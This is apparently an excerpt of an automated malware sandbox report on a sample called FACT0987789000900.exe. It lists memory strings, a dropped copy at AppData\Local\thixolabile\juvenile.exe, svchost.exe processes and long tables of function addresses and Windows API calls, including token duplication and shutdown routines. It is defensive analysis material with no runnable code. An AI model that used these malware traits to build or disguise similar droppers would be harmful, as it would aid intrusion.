              Source: juvenile.exe, 0000000A.00000002.1447557851.000000000097E000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d67dcb4b-9
              Source: juvenile.exe, 0000000A.00000002.1447557851.000000000097E000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a8ff63bc-2
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_00493742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,3_2_00493742
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_005000AC NtdllDialogWndProc_W,3_2_005000AC
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_005000AF NtdllDialogWndProc_W,3_2_005000AF
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_00500133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,3_2_00500133
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_0050044C NtdllDialogWndProc_W,3_2_0050044C
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FE9AF NtdllDialogWndProc_W,CallWindowProcW,3_2_004FE9AF
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AAAFC NtdllDialogWndProc_W,3_2_004AAAFC
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AAB4F NtdllDialogWndProc_W,3_2_004AAB4F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FEC7C NtdllDialogWndProc_W,3_2_004FEC7C
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,3_2_004FECD4
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FEEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,3_2_004FEEEB
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AB11F NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,3_2_004AB11F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,3_2_004FF1D7
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF2D0 SendMessageW,NtdllDialogWndProc_W,3_2_004FF2D0
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,3_2_004FF351
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AB385 GetParent,NtdllDialogWndProc_W,3_2_004AB385
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,3_2_004AB55D
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF5DA NtdllDialogWndProc_W,3_2_004FF5DA
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF5AB NtdllDialogWndProc_W,3_2_004FF5AB
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF654 NtdllDialogWndProc_W,3_2_004FF654
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF609 NtdllDialogWndProc_W,3_2_004FF609
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF689 ClientToScreen,NtdllDialogWndProc_W,3_2_004FF689
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AB715 NtdllDialogWndProc_W,3_2_004AB715
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FF7C3 GetWindowLongW,NtdllDialogWndProc_W,3_2_004FF7C3
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008D3742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,6_2_008D3742
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009400AC NtdllDialogWndProc_W,6_2_009400AC
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009400AF NtdllDialogWndProc_W,6_2_009400AF
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00940133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,6_2_00940133
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0094044C NtdllDialogWndProc_W,6_2_0094044C
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093E9AF NtdllDialogWndProc_W,CallWindowProcW,6_2_0093E9AF
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EAAFC NtdllDialogWndProc_W,6_2_008EAAFC
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EAB4F NtdllDialogWndProc_W,6_2_008EAB4F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,6_2_0093ECD4
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093EC7C NtdllDialogWndProc_W,6_2_0093EC7C
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,6_2_0093EEEB
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,6_2_0093F1D7
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EB11F NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,6_2_008EB11F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F2D0 SendMessageW,NtdllDialogWndProc_W,6_2_0093F2D0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EB385 GetParent,NtdllDialogWndProc_W,6_2_008EB385
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,6_2_0093F351
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F5AB NtdllDialogWndProc_W,6_2_0093F5AB
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F5DA NtdllDialogWndProc_W,6_2_0093F5DA
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,6_2_008EB55D
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F689 ClientToScreen,NtdllDialogWndProc_W,6_2_0093F689
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F609 NtdllDialogWndProc_W,6_2_0093F609
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F654 NtdllDialogWndProc_W,6_2_0093F654
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093F7C3 GetWindowLongW,NtdllDialogWndProc_W,6_2_0093F7C3
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EB715 NtdllDialogWndProc_W,6_2_008EB715
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D6606: CreateFileW,DeviceIoControl,CloseHandle,3_2_004D6606
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004CACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,75035590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,3_2_004CACC5
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_004D79D3
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009179D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_009179D3
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004BB0433_2_004BB043
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004A32003_2_004A3200
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004C410F3_2_004C410F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B02A43_2_004B02A4
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_0049E3E33_2_0049E3E3
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004C038E3_2_004C038E
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004C467F3_2_004C467F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B06D93_2_004B06D9
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004FAACE3_2_004FAACE
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004C4BEF3_2_004C4BEF
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004BCCC13_2_004BCCC1
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_0049AF503_2_0049AF50
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_00496F073_2_00496F07
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AB11F3_2_004AB11F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004BD1B93_2_004BD1B9
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004F31BC3_2_004F31BC
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004C724D3_2_004C724D
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B123A3_2_004B123A
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D13CA3_2_004D13CA
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004993F03_2_004993F0
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AF5633_2_004AF563
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DB6CC3_2_004DB6CC
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004996C03_2_004996C0
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004977B03_2_004977B0
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004C79C93_2_004C79C9
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AFA573_2_004AFA57
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_00499B603_2_00499B60
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004A3B703_2_004A3B70
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_00497D193_2_00497D19
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004AFE6F3_2_004AFE6F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004B9ED03_2_004B9ED0
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_00497FA33_2_00497FA3
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_0134A1D03_2_0134A1D0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008FB0436_2_008FB043
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008E32006_2_008E3200
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0090410F6_2_0090410F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008F02A46_2_008F02A4
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0090038E6_2_0090038E
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008DE3B06_2_008DE3B0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008F06D96_2_008F06D9
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0090467F6_2_0090467F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0093AACE6_2_0093AACE
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00904BEF6_2_00904BEF
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008FCCC16_2_008FCCC1
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008D6F076_2_008D6F07
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008DAF506_2_008DAF50
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009331BC6_2_009331BC
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008FD1B96_2_008FD1B9
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EB11F6_2_008EB11F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008F123A6_2_008F123A
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0090724D6_2_0090724D
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009113CA6_2_009113CA
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008D93F06_2_008D93F0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EF5636_2_008EF563
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008D96C06_2_008D96C0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0091B6CC6_2_0091B6CC
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008D77B06_2_008D77B0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009079C96_2_009079C9
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EFA576_2_008EFA57
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008D9B606_2_008D9B60
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008E3B706_2_008E3B70
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008D7D196_2_008D7D19
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008F9ED06_2_008F9ED0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008EFE6F6_2_008EFE6F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_008D7FA36_2_008D7FA3
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_01569E006_2_01569E00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00408C608_2_00408C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040DC118_2_0040DC11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00407C3F8_2_00407C3F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00418CCC8_2_00418CCC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00406CA08_2_00406CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004028B08_2_004028B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041A4BE8_2_0041A4BE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004182448_2_00418244
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004016508_2_00401650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00402F208_2_00402F20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004193C48_2_004193C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004187888_2_00418788
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00402F898_2_00402F89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00402B908_2_00402B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004073A08_2_004073A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFD4EA8_2_04FFD4EA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FF74E08_2_04FF74E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFC4E08_2_04FFC4E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFA5988_2_04FFA598
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFD7BD8_2_04FFD7BD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFD2168_2_04FFD216
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFCC588_2_04FFCC58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FF2EF88_2_04FF2EF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FF6EE88_2_04FF6EE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFEEE08_2_04FFEEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFCF308_2_04FFCF30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FF586F8_2_04FF586F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFC9808_2_04FFC980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFC6A88_2_04FFC6A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FF43118_2_04FF4311
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFEED08_2_04FFEED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04FFFBA88_2_04FFFBA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_092395788_2_09239578
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_092325808_2_09232580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_092350488_2_09235048
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_09239C488_2_09239C48
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923CCD08_2_0923CCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_09230B308_2_09230B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_092317B08_2_092317B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_09231E988_2_09231E98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923D1288_2_0923D128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923D1198_2_0923D119
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923D5708_2_0923D570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923257A8_2_0923257A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923D5808_2_0923D580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923D9C88_2_0923D9C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923D9D88_2_0923D9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923F8328_2_0923F832
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_092350388_2_09235038
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_092300068_2_09230006
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_092300408_2_09230040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923F8408_2_0923F840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923FC988_2_0923FC98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923CCC08_2_0923CCC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_09230B208_2_09230B20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923EB298_2_0923EB29
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923EB388_2_0923EB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_092393588_2_09239358
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_09238BB18_2_09238BB1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923EF808_2_0923EF80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923EF908_2_0923EF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923179F8_2_0923179F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923F3E88_2_0923F3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_09238BC08_2_09238BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923F3D78_2_0923F3D7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923DE308_2_0923DE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923DE1F8_2_0923DE1F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923E27A8_2_0923E27A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_09231E8A8_2_09231E8A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923E2888_2_0923E288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923E6E08_2_0923E6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0923E6D08_2_0923E6D0
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 10_2_012658E810_2_012658E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00408C6011_2_00408C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0040DC1111_2_0040DC11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00407C3F11_2_00407C3F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00418CCC11_2_00418CCC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00406CA011_2_00406CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_004028B011_2_004028B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0041A4BE11_2_0041A4BE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0041824411_2_00418244
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0040165011_2_00401650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00402F2011_2_00402F20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_004193C411_2_004193C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0041878811_2_00418788
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00402F8911_2_00402F89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00402B9011_2_00402B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_004073A011_2_004073A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBD7B811_2_07CBD7B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CB763011_2_07CB7630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBA59811_2_07CBA598
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBD4EB11_2_07CBD4EB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBC4E011_2_07CBC4E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBD20B11_2_07CBD20B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBCF3011_2_07CBCF30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBEEE011_2_07CBEEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CB6EA811_2_07CB6EA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBCC5811_2_07CBCC58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBC98011_2_07CBC980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CB586F11_2_07CB586F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBC6A811_2_07CBC6A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CB431111_2_07CB4311
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBEED011_2_07CBEED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CB2EF811_2_07CB2EF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_07CBFBA811_2_07CBFBA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A504811_2_086A5048
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A9C4811_2_086A9C48
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A957811_2_086A9578
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A004011_2_086A0040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AF84011_2_086AF840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A503811_2_086A5038
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AF83211_2_086AF832
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A001311_2_086A0013
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086ACCC011_2_086ACCC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086ACCD011_2_086ACCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AFC9811_2_086AFC98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A257211_2_086A2572
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AD57011_2_086AD570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AD12811_2_086AD128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AD11911_2_086AD119
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AD9C811_2_086AD9C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AD9D811_2_086AD9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A258011_2_086A2580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AD58011_2_086AD580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AE27A11_2_086AE27A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086ADE3011_2_086ADE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086ADE1F11_2_086ADE1F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AE6E011_2_086AE6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AE6D011_2_086AE6D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A1E8A11_2_086A1E8A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AE28811_2_086AE288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A1E9811_2_086A1E98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A935811_2_086A9358
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AEB2911_2_086AEB29
